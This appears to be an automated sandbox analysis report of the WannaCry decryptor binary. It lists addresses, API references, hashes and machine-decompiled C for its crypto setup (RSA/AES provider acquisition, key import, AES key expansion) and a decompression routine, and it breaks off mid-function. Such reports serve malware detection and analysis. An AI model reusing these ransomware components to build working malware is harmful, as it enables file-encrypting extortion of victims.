0x0040b0e9
0x0040b0ee
0x0040b0f7
0x0040b114
0x0040b11c
0x0040b122
0x0040b130
0x0040b124
0x0040b124
0x0040b124
0x0040b131
0x0040b136
0x0040b136
0x0040b13c
0x0040b13c
0x0040b142
0x0040b148
0x0040b14c
0x0040b150
0x0040b154
0x0040b154
0x0040b15a
0x0040b15c
0x0040b160
0x0040b166
0x0040b16a
0x0040b16e
0x0040b175
0x0040b181
0x0040b186
0x0040b18f
0x0040b193
0x0040b19b
0x0040b19c
0x0040b1a1
0x0040b1ae
0x0040b1af
0x0040b1b3
0x0040b1b3
0x0040b1b9
0x0040b1b9
0x0040b1c3
0x0040b1ca
0x0040b1ce
0x0040b1d4
0x0040b1da
0x0040b1de
0x0040b1e0
0x0040b1ea
0x0040b1ec
0x0040b1f8
0x0040b1fa
0x0040b1fa
0x0040b200
0x0040b204
0x0040b208
0x0040b216
0x0040b218
0x0040b21b
0x0040b22c
0x0040b230
0x0040b255
0x0040b278
0x0040b283
0x0040b28b
0x0040b28e
0x0040b28f
0x0040b290
0x0040b294
0x00000000
0x00000000
0x0040b20e
0x0040b212
0x0040b29a
0x0040b29a
0x0040b2a4
0x0040b2aa
0x0040b2b0
0x0040b2b0
0x0040b2bc
0x0040b2c2
0x0040b2c6
0x0040b2ca
0x0040b2ca
0x0040b1de
0x0040b2d6
0x0040b2de
0x0040b2e4
0x0040b2e8
0x0040b2ee
0x0040b2fa
0x0040b2fc
0x0040b300
0x0040b304
0x0040b313
0x0040b332
0x0040b334
0x0040b338
0x0040b351
0x0040b355
0x0040b35a
0x0040b373
0x0040b375
0x0040b379
0x0040b398
0x0040b39a
0x0040b39b
0x0040b39f
0x0040b3a2
0x0040b3a6
0x0040b3a6
0x0040b304
0x0040b3b7
0x0040b0f9
0x0040b111
0x0040b111

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
Instruction ID: 635c181c6a855438023d43a1e61ad1cbf7521d36b86b6127b0536a3f97539009
Opcode Fuzzy Hash: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
Instruction Fuzzy Hash: 5F91AE756083858FC718CF28D8906AABBE2FFC9304F14487EE989D7351D634A945CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADC0 Relevance: 3.2, APIs: 2, Instructions: 242
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E0040ADC0(signed int __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				signed int _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1d8; // 0x1
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e0; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1e8; // 0x3
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 8; // 0x5c
						 *(_t287 + 0x10) = _t17;
						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x28; // 0x7c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4179b0 +  *(_t287 + 0x2c) * 4) ^  *(0x417db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004175B0 ^  *0x004171B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
							_t200 =  *(_t286 + 8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x00416FB0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x00416FB0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x00416FB0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x416fb0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A610(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}

0x0040adc5
0x0040adce
0x0040add9
0x0040ade3
0x0040ade8
0x0040ade9
0x0040ade9
0x0040adee
0x0040adf7
0x0040ae14
0x0040ae1c
0x0040ae22
0x0040ae30
0x0040ae24
0x0040ae24
0x0040ae24
0x0040ae31
0x0040ae36
0x0040ae36
0x0040ae3c
0x0040ae3c
0x0040ae42
0x0040ae48
0x0040ae4c
0x0040ae50
0x0040ae54
0x0040ae54
0x0040ae5a
0x0040ae5c
0x0040ae60
0x0040ae63
0x0040ae67
0x0040ae6b
0x0040ae72
0x0040ae7e
0x0040ae83
0x0040ae8c
0x0040ae90
0x0040ae98
0x0040ae99
0x0040ae9e
0x0040aeab
0x0040aeac
0x0040aeb0
0x0040aeb0
0x0040aeb6
0x0040aeb6
0x0040aec0
0x0040aec7
0x0040aecb
0x0040aed1
0x0040aed4
0x0040aed8
0x0040aeda
0x0040aee4
0x0040aee6
0x0040aef2
0x0040aef4
0x0040aef4
0x0040aefa
0x0040aefe
0x0040af02
0x0040af10
0x0040af12
0x0040af15
0x0040af26
0x0040af2a
0x0040af4f
0x0040af72
0x0040af7d
0x0040af85
0x0040af88
0x0040af89
0x0040af8a
0x0040af8e
0x00000000
0x00000000
0x0040af08
0x0040af0c
0x0040af94
0x0040af94
0x0040af9e
0x0040afa4
0x0040afaa
0x0040afaa
0x0040afb6
0x0040afbc
0x0040afc0
0x0040afc4
0x0040afc4
0x0040aed8
0x0040afd0
0x0040afd8
0x0040afde
0x0040afe2
0x0040afe8
0x0040aff4
0x0040aff6
0x0040affa
0x0040affe
0x0040b00d
0x0040b029
0x0040b02b
0x0040b02f
0x0040b048
0x0040b04c
0x0040b051
0x0040b06a
0x0040b06c
0x0040b070
0x0040b08f
0x0040b091
0x0040b092
0x0040b096
0x0040b099
0x0040b09d
0x0040b09d
0x0040affe
0x0040b0ae
0x0040adf9
0x0040ae11
0x0040ae11

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
Instruction ID: 9bf03c186ab60868eb4058f96665f2b4dca6c7ab88ed953fee9cff2198bbc34e
Opcode Fuzzy Hash: e2a5344183224385ce8cc6f64ef416fa8b7c135a3dae7c4b4300b22148696450
Instruction Fuzzy Hash: D691BE756083858FC718CF28D8805AABBE2FFC9308F14487EE989D7351C634E956CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004046F0 Relevance: 1.5, APIs: 1, Instructions: 46
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F0(void* __ecx, CHAR* _a4) {

				_t25 = __ecx;
				if(E004046B0(__ecx) != 0) {
					_t7 = _a4;
					if(_a4 != 0) {
						if(E004049B0( *(__ecx + 4), __ecx + 8, _t7) != 0) {
							goto L7;
						} else {
							E00404770(_t25);
							return 0;
						}
					} else {
						if(CryptImportKey( *(__ecx + 4), 0x420794, 0x494, 0, 0, __ecx + 8) != 0) {
							L7:
							return 1;
						} else {
							E00404770(_t25);
							return 0;
						}
					}
				} else {
					E00404770(__ecx);
					return 0;
				}
			}

0x004046f1
0x004046fa
0x00404709
0x0040470f
0x00404751
0x00000000
0x00404753
0x00404755
0x0040475d
0x0040475d
0x00404711
0x0040472f
0x00404760
0x00404766
0x00404731
0x00404733
0x0040473b
0x0040473b
0x0040472f
0x004046fc
0x004046fe
0x00404706
0x00404706

APIs

Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD

CryptImportKey.ADVAPI32(?,00420794,00000494,00000000,00000000,?,?,00402031,?), ref: 00404727

Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
Part of subcall function 00404770: CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
Part of subcall function 00404770: CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroy$AcquireImportRelease
String ID:
API String ID: 3621138593-0
Opcode ID: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
Instruction ID: d4e90e0c2f988709a992e7d604814048f9cd1a1bd42c9a5a50fcd20aee9fd3f8
Opcode Fuzzy Hash: 9403bbdd090a9753ee064b817ff4eb55f6c4c80258570a396feff9da41e395ed
Instruction Fuzzy Hash: 5DF019F130425156E660E675A942F9B62998BE1B08F00483BF605E72D1EB78EC42829C

Uniqueness

Uniqueness Score: -1.00%

Function 004046B0 Relevance: 1.5, APIs: 1, Instructions: 26
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004046B0(void* __ecx) {
				int _t5;
				HCRYPTPROV* _t8;
				signed int _t9;

				_t9 = 0;
				_t8 = __ecx + 4;
				while(1) {
					asm("sbb eax, eax");
					_t5 = CryptAcquireContextA(_t8, 0,  ~_t9 & "Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000);
					if(_t5 != 0) {
						break;
					}
					_t9 = _t9 + 1;
					if(_t9 < 2) {
						continue;
					} else {
						return _t5;
					}
					L5:
				}
				return 1;
				goto L5;
			}

0x004046b2
0x004046b4
0x004046b7
0x004046c0
0x004046cd
0x004046d5
0x00000000
0x00000000
0x004046d7
0x004046db
0x00000000
0x004046df
0x004046df
0x004046df
0x00000000
0x004046db
0x004046e7
0x00000000

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
Instruction ID: 312dc029323720c7b5bb6801e757edcf2da9b650c6ce32f76f805a45e944d122
Opcode Fuzzy Hash: bfca8852325fc6aa5ed2ff2f6e8500fcc0a6d4c389fe5d637677a2daa5e65efa
Instruction Fuzzy Hash: 63E0C27B35003029E320042ABC05BE786C8D7E2B61F014436FD05E6184D1598C8780D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF30 Relevance: .5, Instructions: 515
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0040DF30() {
				intOrPtr _t308;
				intOrPtr _t310;
				signed int _t356;
				signed int* _t361;
				signed int _t362;
				intOrPtr _t403;
				signed int _t409;
				intOrPtr _t410;
				void* _t411;
				void* _t412;

				_t410 =  *((intOrPtr*)(_t412 + 0x24));
				_t409 =  *(_t412 + 0x2c);
				_t361 =  *(_t410 + 4);
				_t411 =  *_t409;
				_t356 =  *(_t410 + 0x1c);
				 *(_t412 + 0x2c) =  *(_t409 + 4);
				_t308 =  *((intOrPtr*)(_t410 + 0x30));
				 *(_t412 + 0x28) =  *(_t410 + 0x20);
				_t403 =  *((intOrPtr*)(_t410 + 0x34));
				 *(_t412 + 0x10) = _t361;
				if(_t403 >= _t308) {
					_t310 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
				} else {
					_t310 = _t308 - _t403 - 1;
				}
				_t362 =  *_t361;
				 *((intOrPtr*)(_t412 + 0x14)) = _t310;
				if(_t362 > 9) {
					L86:
					 *(_t410 + 0x20) =  *(_t412 + 0x28);
					 *(_t410 + 0x1c) = _t356;
					 *(_t409 + 4) =  *(_t412 + 0x2c);
					_push(0xfffffffe);
					_push(_t409);
					 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
					 *_t409 = _t411;
					_push(_t410);
					 *((intOrPtr*)(_t410 + 0x34)) = _t403;
					return E0040DDA0();
				} else {
					do {
						switch( *((intOrPtr*)(_t362 * 4 +  &M0040E6CC))) {
							case 0:
								if(_t310 < 0x102 ||  *(_t412 + 0x2c) < 0xa) {
									L12:
									_t315 =  *(_t412 + 0x10);
									 *_t315 = 1;
									_t315[3] = 0;
									_t315[2] = _t315[5];
									goto L13;
								} else {
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t410 + 0x1c) = _t356;
									 *(_t409 + 4) =  *(_t412 + 0x2c);
									 *_t409 = _t411;
									_t349 =  *(_t412 + 0x10);
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push(_t409);
									_push(_t410);
									_push(_t349[6]);
									_push(_t349[5]);
									_push(0);
									_push(0);
									_t350 = E0040FBC0();
									_t411 =  *_t409;
									_t356 =  *(_t410 + 0x1c);
									 *(_t412 + 0x44) =  *(_t409 + 4);
									_t397 =  *((intOrPtr*)(_t410 + 0x30));
									 *(_t412 + 0x40) =  *(_t410 + 0x20);
									_t403 =  *((intOrPtr*)(_t410 + 0x34));
									_t412 = _t412 + 0x18;
									 *(_t412 + 0x30) = _t350;
									if(_t403 >= _t397) {
										_t399 =  *((intOrPtr*)(_t410 + 0x2c)) - _t403;
									} else {
										_t399 = _t397 - _t403 - 1;
									}
									 *((intOrPtr*)(_t412 + 0x14)) = _t399;
									if(_t350 == 0) {
										goto L12;
									} else {
										asm("sbb eax, eax");
										 *( *(_t412 + 0x10)) = ( ~(_t350 - 1) & 0x00000002) + 7;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								}
								goto L99;
							case 1:
								L13:
								_t317 = ( *(_t412 + 0x10))[3];
								 *(_t412 + 0x18) = _t317;
								if(_t356 >= _t317) {
									L16:
									_t321 = ( *(_t412 + 0x10))[2] + ( *(0x41a260 + _t317 * 4) &  *(_t412 + 0x28)) * 8;
									 *(_t412 + 0x18) = _t321;
									 *((intOrPtr*)(_t412 + 0x1c)) = 0;
									 *(_t412 + 0x28) =  *(_t412 + 0x28) >>  *(_t321 + 1);
									_t373 =  *(_t412 + 0x18);
									_t356 = _t356;
									_t326 =  *_t373;
									if(0 != 0) {
										if((_t326 & 0x00000010) == 0) {
											if((_t326 & 0x00000040) == 0) {
												goto L34;
											} else {
												_t329 =  *(_t412 + 0x10);
												if((_t326 & 0x00000020) == 0) {
													 *_t329 = 9;
													 *(_t409 + 0x18) = "invalid literal/length code";
													goto L90;
												} else {
													 *_t329 = 7;
													_t310 =  *((intOrPtr*)(_t412 + 0x14));
													goto L85;
												}
											}
										} else {
											_t381 =  *(_t412 + 0x10);
											_t381[2] = 0;
											 *_t381 = 2;
											_t381[1] =  *( *(_t412 + 0x18) + 4);
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										_t337 =  *(_t412 + 0x10);
										_t337[2] =  *(_t373 + 4);
										 *_t337 = 6;
										_t310 =  *((intOrPtr*)(_t412 + 0x14));
										goto L85;
									}
								} else {
									while(1) {
										_t338 =  *(_t412 + 0x2c);
										if(_t338 == 0) {
											goto L88;
										}
										 *(_t412 + 0x2c) = _t338 - 1;
										_t345 = 0 << _t356;
										_t356 = _t356 + 8;
										 *(_t412 + 0x30) = 0;
										_t317 =  *(_t412 + 0x18);
										_t411 = _t411 + 1;
										 *(_t412 + 0x28) =  *(_t412 + 0x28) | _t345;
										if(_t356 < _t317) {
											continue;
										} else {
											goto L16;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 2:
								__ecx =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L26:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 4)) =  *((intOrPtr*)( *(__esp + 0x10) + 4)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									__ecx = 0;
									__cl =  *((intOrPtr*)(__eax + 0x11));
									 *__eax = 3;
									 *(__eax + 0xc) = 0;
									__ecx =  *(__eax + 0x18);
									 *(__eax + 8) =  *(__eax + 0x18);
									goto L28;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L26;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 3:
								__eax =  *(__esp + 0x10);
								L28:
								__eax =  *(__eax + 0xc);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L31:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									 *(__esp + 0x10) =  *( *(__esp + 0x10) + 8);
									__eax =  *( *(__esp + 0x10) + 8) + __ecx * 8;
									__ecx = 0;
									 *(__esp + 0x18) = __eax;
									__cl =  *((intOrPtr*)(__eax + 1));
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x1c) = 0;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax = 0;
									__ecx =  *(__esp + 0x18);
									__ebx = __ebx;
									__eax = 0;
									__al =  *( *(__esp + 0x18));
									if((__al & 0x00000010) == 0) {
										if((__al & 0x00000040) != 0) {
											__eax =  *(__esp + 0x10);
											 *( *(__esp + 0x10)) = 9;
											__edi[6] = "invalid distance code";
											L90:
											 *(_t410 + 0x20) =  *(_t412 + 0x28);
											 *(_t410 + 0x1c) = _t356;
											 *(_t409 + 4) =  *(_t412 + 0x2c);
											_push(0xfffffffd);
											_push(_t409);
											 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
											 *_t409 = _t411;
											_push(_t410);
											 *((intOrPtr*)(_t410 + 0x34)) = _t403;
											return E0040DDA0();
										} else {
											L34:
											( *(_t412 + 0x10))[3] = _t326;
											( *(_t412 + 0x10))[2] =  *(_t412 + 0x18) +  *( *(_t412 + 0x18) + 4) * 8;
											_t310 =  *((intOrPtr*)(_t412 + 0x14));
											goto L85;
										}
									} else {
										__ecx =  *(__esp + 0x10);
										__eax = 0;
										 *((intOrPtr*)(__ecx + 8)) = 0;
										 *(__esp + 0x18) =  *( *(__esp + 0x18) + 4);
										 *__ecx = 4;
										 *(__ecx + 0xc) =  *( *(__esp + 0x18) + 4);
										__eax =  *(__esp + 0x14);
										goto L85;
									}
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											goto L88;
										}
										__eax = __eax - 1;
										__ecx = __ebx;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__al =  *__ebp;
										__ebx = __ebx + 8;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L31;
										}
										goto L99;
									}
									goto L88;
								}
								goto L99;
							case 4:
								__eax =  *(__esp + 0x10);
								__eax =  *( *(__esp + 0x10) + 8);
								 *(__esp + 0x18) = __eax;
								if(__ebx >= __eax) {
									L38:
									__ecx =  *(0x41a260 + __eax * 4);
									__eax =  *(__esp + 0x28);
									__ecx = __ecx &  *(__esp + 0x28);
									__eax =  *(__esp + 0x10);
									 *((intOrPtr*)( *(__esp + 0x10) + 0xc)) =  *((intOrPtr*)( *(__esp + 0x10) + 0xc)) + __ecx;
									__ecx =  *(__esp + 0x18);
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									 *(__esp + 0x28) =  *(__esp + 0x28) >> __cl;
									__eax =  *(__esp + 0x18);
									__ebx = __ebx -  *(__esp + 0x18);
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 5;
									goto L39;
								} else {
									while(1) {
										__eax =  *(__esp + 0x2c);
										if(__eax == 0) {
											break;
										}
										__ecx = 0;
										__eax = __eax - 1;
										__cl =  *__ebp;
										 *(__esp + 0x2c) = __eax;
										__eax = 0;
										__ecx = __ebx;
										__eax = 0 << __cl;
										__ecx =  *(__esp + 0x28);
										__ebx = __ebx + 8;
										 *(__esp + 0x30) = 0;
										__ecx =  *(__esp + 0x28) | 0 << __cl;
										__eax =  *(__esp + 0x18);
										__ebp = __ebp + 1;
										 *(__esp + 0x28) =  *(__esp + 0x28) | 0 << __cl;
										if(__ebx < __eax) {
											continue;
										} else {
											goto L38;
										}
										goto L99;
									}
									L88:
									 *(_t410 + 0x1c) = _t356;
									 *(_t410 + 0x20) =  *(_t412 + 0x28);
									 *(_t409 + 4) = 0;
									 *_t409 = _t411;
									 *((intOrPtr*)(_t409 + 8)) =  *((intOrPtr*)(_t409 + 8)) + _t411 -  *_t409;
									 *((intOrPtr*)(_t410 + 0x34)) = _t403;
									_push( *(_t412 + 0x30));
									_push(_t409);
									_push(_t410);
									return E0040DDA0();
								}
								goto L99;
							case 5:
								L39:
								__ecx =  *(__esp + 0x10);
								__eax = __edx;
								__eax = __edx -  *((intOrPtr*)( *(__esp + 0x10) + 0xc));
								__ecx =  *(__esi + 0x28);
								 *(__esp + 0x1c) = __eax;
								if(__eax < __ecx) {
									__eax =  *(__esi + 0x2c);
									__eax =  *(__esi + 0x2c) - __ecx;
									__ecx =  *(__esp + 0x1c);
									 *(__esp + 0x20) = __eax;
									while(1) {
										__ecx = __ecx + __eax;
										__eax =  *(__esi + 0x28);
										if(__ecx >=  *(__esi + 0x28)) {
											break;
										}
										__eax =  *(__esp + 0x20);
									}
									 *(__esp + 0x1c) = __ecx;
								}
								__ecx =  *(__esp + 0x10);
								__eax =  *(__ecx + 4);
								__eax =  *(__esp + 0x14);
								if( *(__ecx + 4) != 0) {
									do {
